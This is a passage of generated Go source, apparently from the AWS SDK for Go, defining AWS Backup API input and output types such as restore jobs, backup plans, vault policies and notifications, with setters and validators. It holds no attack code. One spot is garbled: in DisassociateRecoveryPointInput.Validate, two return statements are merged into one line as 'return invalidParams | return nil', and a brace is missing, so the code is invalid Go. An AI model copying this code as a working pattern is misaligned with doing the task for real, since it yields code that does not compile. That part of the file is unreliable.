// SetRestoreJobId sets the RestoreJobId field's value.
func (s *DescribeRestoreJobInput) SetRestoreJobId(v string) *DescribeRestoreJobInput {
s.RestoreJobId = &v
return s
}
type DescribeRestoreJobOutput struct {
_ struct{} `type:"structure"`
// Returns the account ID that owns the restore job.
AccountId *string `type:"string"`
// The size, in bytes, of the restored resource.
BackupSizeInBytes *int64 `type:"long"`
// The date and time that a job to restore a recovery point is completed, in
// Unix format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource whose recovery
// point is being restored. The format of the ARN depends on the resource type
// of the backed-up resource.
CreatedResourceArn *string `type:"string"`
// The date and time that a restore job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The amount of time in minutes that a job restoring a recovery point is expected
// to take.
ExpectedCompletionTimeMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage that is complete of a job at the time the
// job status was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// Returns metadata associated with a restore job listed by resource type.
ResourceType *string `type:"string"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
// Status code specifying the state of the job that is initiated by AWS Backup
// to restore a recovery point.
Status *string `type:"string" enum:"RestoreJobStatus"`
// A message showing the status of a job to restore a recovery point.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s DescribeRestoreJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRestoreJobOutput) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *DescribeRestoreJobOutput) SetAccountId(v string) *DescribeRestoreJobOutput {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeRestoreJobOutput) SetBackupSizeInBytes(v int64) *DescribeRestoreJobOutput {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeRestoreJobOutput) SetCompletionDate(v time.Time) *DescribeRestoreJobOutput {
s.CompletionDate = &v
return s
}
// SetCreatedResourceArn sets the CreatedResourceArn field's value.
func (s *DescribeRestoreJobOutput) SetCreatedResourceArn(v string) *DescribeRestoreJobOutput {
s.CreatedResourceArn = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeRestoreJobOutput) SetCreationDate(v time.Time) *DescribeRestoreJobOutput {
s.CreationDate = &v
return s
}
// SetExpectedCompletionTimeMinutes sets the ExpectedCompletionTimeMinutes field's value.
func (s *DescribeRestoreJobOutput) SetExpectedCompletionTimeMinutes(v int64) *DescribeRestoreJobOutput {
s.ExpectedCompletionTimeMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeRestoreJobOutput) SetIamRoleArn(v string) *DescribeRestoreJobOutput {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *DescribeRestoreJobOutput) SetPercentDone(v string) *DescribeRestoreJobOutput {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRestoreJobOutput) SetRecoveryPointArn(v string) *DescribeRestoreJobOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeRestoreJobOutput) SetResourceType(v string) *DescribeRestoreJobOutput {
s.ResourceType = &v
return s
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *DescribeRestoreJobOutput) SetRestoreJobId(v string) *DescribeRestoreJobOutput {
s.RestoreJobId = &v
return s
}
// SetStatus sets the Status field's value.
func (s *DescribeRestoreJobOutput) SetStatus(v string) *DescribeRestoreJobOutput {
s.Status = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *DescribeRestoreJobOutput) SetStatusMessage(v string) *DescribeRestoreJobOutput {
s.StatusMessage = &v
return s
}
type DisassociateRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The unique name of an AWS Backup vault. Required.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies an AWS Backup recovery
// point. Required.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DisassociateRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DisassociateRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DisassociateRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DisassociateRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams | return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DisassociateRecoveryPointInput) SetBackupVaultName(v string) *DisassociateRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DisassociateRecoveryPointInput) SetRecoveryPointArn(v string) *DisassociateRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
type DisassociateRecoveryPointOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DisassociateRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DisassociateRecoveryPointOutput) GoString() string {
return s.String()
}
type ExportBackupPlanTemplateInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s ExportBackupPlanTemplateInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ExportBackupPlanTemplateInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ExportBackupPlanTemplateInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ExportBackupPlanTemplateInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ExportBackupPlanTemplateInput) SetBackupPlanId(v string) *ExportBackupPlanTemplateInput {
s.BackupPlanId = &v
return s
}
type ExportBackupPlanTemplateOutput struct {
_ struct{} `type:"structure"`
// The body of a backup plan template in JSON format.
//
// This is a signed JSON document that cannot be modified before being passed
// to GetBackupPlanFromJSON.
BackupPlanTemplateJson *string `type:"string"`
}
// String returns the string representation
func (s ExportBackupPlanTemplateOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ExportBackupPlanTemplateOutput) GoString() string {
return s.String()
}
// SetBackupPlanTemplateJson sets the BackupPlanTemplateJson field's value.
func (s *ExportBackupPlanTemplateOutput) SetBackupPlanTemplateJson(v string) *ExportBackupPlanTemplateOutput {
s.BackupPlanTemplateJson = &v
return s
}
type GetBackupPlanFromJSONInput struct {
_ struct{} `type:"structure"`
// A customer-supplied backup plan document in JSON format.
//
// BackupPlanTemplateJson is a required field
BackupPlanTemplateJson *string `type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupPlanFromJSONInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromJSONInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanFromJSONInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanFromJSONInput"}
if s.BackupPlanTemplateJson == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanTemplateJson"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanTemplateJson sets the BackupPlanTemplateJson field's value.
func (s *GetBackupPlanFromJSONInput) SetBackupPlanTemplateJson(v string) *GetBackupPlanFromJSONInput {
s.BackupPlanTemplateJson = &v
return s
}
type GetBackupPlanFromJSONOutput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
BackupPlan *Plan `type:"structure"`
}
// String returns the string representation
func (s GetBackupPlanFromJSONOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromJSONOutput) GoString() string {
return s.String()
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *GetBackupPlanFromJSONOutput) SetBackupPlan(v *Plan) *GetBackupPlanFromJSONOutput {
s.BackupPlan = v
return s
}
type GetBackupPlanFromTemplateInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a stored backup plan template.
//
// BackupPlanTemplateId is a required field
BackupPlanTemplateId *string `location:"uri" locationName:"templateId" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupPlanFromTemplateInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromTemplateInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanFromTemplateInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanFromTemplateInput"}
if s.BackupPlanTemplateId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanTemplateId"))
}
if s.BackupPlanTemplateId != nil && len(*s.BackupPlanTemplateId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanTemplateId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanTemplateId sets the BackupPlanTemplateId field's value.
func (s *GetBackupPlanFromTemplateInput) SetBackupPlanTemplateId(v string) *GetBackupPlanFromTemplateInput {
s.BackupPlanTemplateId = &v
return s
}
type GetBackupPlanFromTemplateOutput struct {
_ struct{} `type:"structure"`
// Returns the body of a backup plan based on the target template, including
// the name, rules, and backup vault of the plan.
BackupPlanDocument *Plan `type:"structure"`
}
// String returns the string representation
func (s GetBackupPlanFromTemplateOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanFromTemplateOutput) GoString() string {
return s.String()
}
// SetBackupPlanDocument sets the BackupPlanDocument field's value.
func (s *GetBackupPlanFromTemplateOutput) SetBackupPlanDocument(v *Plan) *GetBackupPlanFromTemplateOutput {
s.BackupPlanDocument = v
return s
}
type GetBackupPlanInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `location:"querystring" locationName:"versionId" type:"string"`
}
// String returns the string representation
func (s GetBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupPlanInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupPlanInput) SetBackupPlanId(v string) *GetBackupPlanInput {
s.BackupPlanId = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *GetBackupPlanInput) SetVersionId(v string) *GetBackupPlanInput {
s.VersionId = &v
return s
}
type GetBackupPlanOutput struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type. The list is populated
// only if the advanced option is set for the backup plan.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
BackupPlan *Plan `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time that a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The date and time that a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// The last time a job to back up resources was run with this backup plan. A
// date and time, in Unix format and Coordinated Universal Time (UTC). The value
// of LastExecutionDate is accurate to milliseconds. For example, the value
// 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
LastExecutionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s GetBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *GetBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *GetBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *GetBackupPlanOutput) SetBackupPlan(v *Plan) *GetBackupPlanOutput {
s.BackupPlan = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *GetBackupPlanOutput) SetBackupPlanArn(v string) *GetBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupPlanOutput) SetBackupPlanId(v string) *GetBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *GetBackupPlanOutput) SetCreationDate(v time.Time) *GetBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *GetBackupPlanOutput) SetCreatorRequestId(v string) *GetBackupPlanOutput {
s.CreatorRequestId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *GetBackupPlanOutput) SetDeletionDate(v time.Time) *GetBackupPlanOutput {
s.DeletionDate = &v
return s
}
// SetLastExecutionDate sets the LastExecutionDate field's value.
func (s *GetBackupPlanOutput) SetLastExecutionDate(v time.Time) *GetBackupPlanOutput {
s.LastExecutionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *GetBackupPlanOutput) SetVersionId(v string) *GetBackupPlanOutput {
s.VersionId = &v
return s
}
type GetBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
//
// SelectionId is a required field
SelectionId *string `location:"uri" locationName:"selectionId" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.SelectionId == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionId"))
}
if s.SelectionId != nil && len(*s.SelectionId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("SelectionId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupSelectionInput) SetBackupPlanId(v string) *GetBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *GetBackupSelectionInput) SetSelectionId(v string) *GetBackupSelectionInput {
s.SelectionId = &v
return s
}
type GetBackupSelectionOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// Specifies the body of a request to assign a set of resources to a backup
// plan.
BackupSelection *Selection `type:"structure"`
// The date and time a backup selection is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
SelectionId *string `type:"string"`
}
// String returns the string representation
func (s GetBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupSelectionOutput) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *GetBackupSelectionOutput) SetBackupPlanId(v string) *GetBackupSelectionOutput {
s.BackupPlanId = &v
return s
}
// SetBackupSelection sets the BackupSelection field's value.
func (s *GetBackupSelectionOutput) SetBackupSelection(v *Selection) *GetBackupSelectionOutput {
s.BackupSelection = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *GetBackupSelectionOutput) SetCreationDate(v time.Time) *GetBackupSelectionOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *GetBackupSelectionOutput) SetCreatorRequestId(v string) *GetBackupSelectionOutput {
s.CreatorRequestId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *GetBackupSelectionOutput) SetSelectionId(v string) *GetBackupSelectionOutput {
s.SelectionId = &v
return s
}
type GetBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *GetBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
type GetBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The backup vault access policy document in JSON format.
Policy *string `type:"string"`
}
// String returns the string representation
func (s GetBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetBackupVaultArn(v string) *GetBackupVaultAccessPolicyOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetBackupVaultName(v string) *GetBackupVaultAccessPolicyOutput {
s.BackupVaultName = &v
return s
}
// SetPolicy sets the Policy field's value.
func (s *GetBackupVaultAccessPolicyOutput) SetPolicy(v string) *GetBackupVaultAccessPolicyOutput {
s.Policy = &v
return s
}
type GetBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s GetBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetBackupVaultNotificationsInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultNotificationsInput) SetBackupVaultName(v string) *GetBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
type GetBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// An array of events that indicate the status of jobs to back up resources
// to the backup vault.
BackupVaultEvents []*string `type:"list"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// An ARN that uniquely identifies an Amazon Simple Notification Service (Amazon
// SNS) topic; for example, arn:aws:sns:us-west-2:111122223333:MyTopic.
SNSTopicArn *string `type:"string"`
}
// String returns the string representation
func (s GetBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultArn(v string) *GetBackupVaultNotificationsOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultEvents sets the BackupVaultEvents field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultEvents(v []*string) *GetBackupVaultNotificationsOutput {
s.BackupVaultEvents = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetBackupVaultNotificationsOutput) SetBackupVaultName(v string) *GetBackupVaultNotificationsOutput {
s.BackupVaultName = &v
return s
}
// SetSNSTopicArn sets the SNSTopicArn field's value.
func (s *GetBackupVaultNotificationsOutput) SetSNSTopicArn(v string) *GetBackupVaultNotificationsOutput {
s.SNSTopicArn = &v
return s
}
type GetRecoveryPointRestoreMetadataInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s GetRecoveryPointRestoreMetadataInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetRecoveryPointRestoreMetadataInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *GetRecoveryPointRestoreMetadataInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "GetRecoveryPointRestoreMetadataInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *GetRecoveryPointRestoreMetadataInput) SetBackupVaultName(v string) *GetRecoveryPointRestoreMetadataInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *GetRecoveryPointRestoreMetadataInput) SetRecoveryPointArn(v string) *GetRecoveryPointRestoreMetadataInput {
s.RecoveryPointArn = &v
return s
}
type GetRecoveryPointRestoreMetadataOutput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// The set of metadata key-value pairs that describe the original configuration
// of the backed-up resource. These values vary depending on the service that
// is being restored.
RestoreMetadata map[string]*string `type:"map" sensitive:"true"`
}
// String returns the string representation
func (s GetRecoveryPointRestoreMetadataOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetRecoveryPointRestoreMetadataOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetBackupVaultArn(v string) *GetRecoveryPointRestoreMetadataOutput {
s.BackupVaultArn = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetRecoveryPointArn(v string) *GetRecoveryPointRestoreMetadataOutput {
s.RecoveryPointArn = &v
return s
}
// SetRestoreMetadata sets the RestoreMetadata field's value.
func (s *GetRecoveryPointRestoreMetadataOutput) SetRestoreMetadata(v map[string]*string) *GetRecoveryPointRestoreMetadataOutput {
s.RestoreMetadata = v
return s
}
type GetSupportedResourceTypesInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s GetSupportedResourceTypesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetSupportedResourceTypesInput) GoString() string {
return s.String()
}
type GetSupportedResourceTypesOutput struct {
_ struct{} `type:"structure"`
// Contains a string with the supported AWS resource types:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ResourceTypes []*string `type:"list"`
}
// String returns the string representation
func (s GetSupportedResourceTypesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s GetSupportedResourceTypesOutput) GoString() string {
return s.String()
}
// SetResourceTypes sets the ResourceTypes field's value.
func (s *GetSupportedResourceTypesOutput) SetResourceTypes(v []*string) *GetSupportedResourceTypesOutput {
s.ResourceTypes = v
return s
}
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
type InvalidParameterValueException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidParameterValueException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidParameterValueException) GoString() string {
return s.String()
}
func newErrorInvalidParameterValueException(v protocol.ResponseMetadata) error {
return &InvalidParameterValueException{
RespMetadata: v,
}
}
